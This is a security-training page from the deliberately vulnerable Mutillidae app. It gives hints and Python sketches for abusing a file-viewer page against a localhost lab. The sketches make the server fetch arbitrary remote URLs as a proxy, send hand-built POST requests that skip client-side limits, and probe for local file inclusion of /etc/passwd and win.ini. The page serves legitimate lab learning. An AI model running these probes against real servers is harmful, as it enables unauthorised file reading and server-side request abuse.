Mutillidae: Born to be Hacked

Hacker Files of Old
Take the time to read some of these great old school hacker text files.
Just choose one from the list and submit.
Text File Name
For other great old school hacking texts, check out http://www.textfiles.com/.
Hints
  • For Malicious File Execution/Insecure Direct Object Reference: Hmm, looks like I'm grabbing files from another site. Could we use this as a proxy? (See the first sketch after this list.) Tip: Try the Tamper Data Firefox plugin or maybe Paros Proxy.
  • I wonder what the traffic generated by this page looks like. Wireshark is a good tool for examining network traffic.
  • Some code contains naive protections such as limiting the width of HTML fields. If you find that you need more room, try using a tool like Firebug to change the size of the field to be as long as you like. As you advance, try using tools like netcat to make your own POST requests without having to use the web page at all (see the raw-POST sketch after this list).
  • Another tool that lets you use a page normally and then simply change the parameters is Tamper Data. Because Tamper Data manipulates the request after it has left the browser, any HTML or JavaScript checks have already run and are completely useless as a security measure. Any use of HTML or JavaScript for security purposes is useless anyway; some developers still fail to recognize this fact to this day.
  • So if this page is grabbing files, loading them, and then displaying their contents, is it possible to use this page to grab any HTML file from any site?
  • There is nothing special about HTML files except their format. Functions that load files usually do not care about a file's contents. (An exception might be MSXML's DOMDocument.load(), which is simply a shortcut that both loads and parses XML in one call.) If the loader doesn't care what it loads, could this page be used to load any arbitrary file? Do the files have to be remote, or could they be local? (See the local-file sketch after this list.)
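
Below is a minimal Python sketch of the "proxy" idea from the first hint: instead of picking one of the listed text files, we hand the page an arbitrary remote URL and let the server fetch it for us. The page name (text-file-viewer.php) and the POST parameter name (textfile) are assumptions; confirm the real names by watching a normal submission in Burp Suite or Tamper Data first.

    # Ask the vulnerable page to fetch an arbitrary remote URL, effectively
    # using the server as a proxy. Page and parameter names are assumptions.
    import requests

    TARGET = "http://localhost/mutillidae/index.php?page=text-file-viewer.php"

    # Instead of one of the listed hacker text files, submit any URL we like.
    payload = {"textfile": "http://www.textfiles.com/"}

    response = requests.post(TARGET, data=payload)
    print(response.status_code)
    print(response.text[:500])  # the fetched content is echoed back inside the page

If that works, it is the Mutillidae server, not your browser, that makes the outbound request, which is what makes the page usable as a crude proxy.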
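
The next sketch follows the netcat tip above: a POST request built by hand over a plain socket. No maxlength attribute or JavaScript check can interfere, because those only ever existed in the browser. The host, path, and textfile parameter name are again assumptions for illustration.

    # Hand-built POST request in the spirit of the netcat tip: client-side
    # limits such as maxlength simply do not apply to a request we write
    # ourselves. Host, path, and parameter name are assumptions.
    import socket

    HOST, PORT = "localhost", 80
    body = "textfile=" + "A" * 5000  # far longer than any HTML field would allow
    request = (
        "POST /mutillidae/index.php?page=text-file-viewer.php HTTP/1.1\r\n"
        f"Host: {HOST}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n" + body
    )

    with socket.create_connection((HOST, PORT)) as sock:
        sock.sendall(request.encode())
        reply = b""
        while chunk := sock.recv(4096):
            reply += chunk

    print(reply.decode(errors="replace")[:500])

The same request could just as well be piped into netcat itself; the point is only that the request is yours to write, not the browser's.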
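
Finally, a sketch of the local-file question raised in the last two hints: if the loader does not care what it loads, it may be willing to read files from the server's own disk. The candidate paths are common guesses and the parameter name is, as before, an assumption; which paths succeed depends on the server's operating system and configuration.

    # Probe whether the file loader also accepts local paths (local file
    # inclusion). Paths are common guesses; parameter name is an assumption.
    import requests

    TARGET = "http://localhost/mutillidae/index.php?page=text-file-viewer.php"

    candidates = [
        "/etc/passwd",              # classic world-readable file on Linux
        "../../../../etc/passwd",   # relative traversal from the web root
        "C:\\Windows\\win.ini",     # a Windows equivalent
    ]

    for path in candidates:
        resp = requests.post(TARGET, data={"textfile": path})
        leaked = "root:" in resp.text or "[fonts]" in resp.text
        print(f"{path!r}: {'contents leaked' if leaked else 'no obvious leak'}")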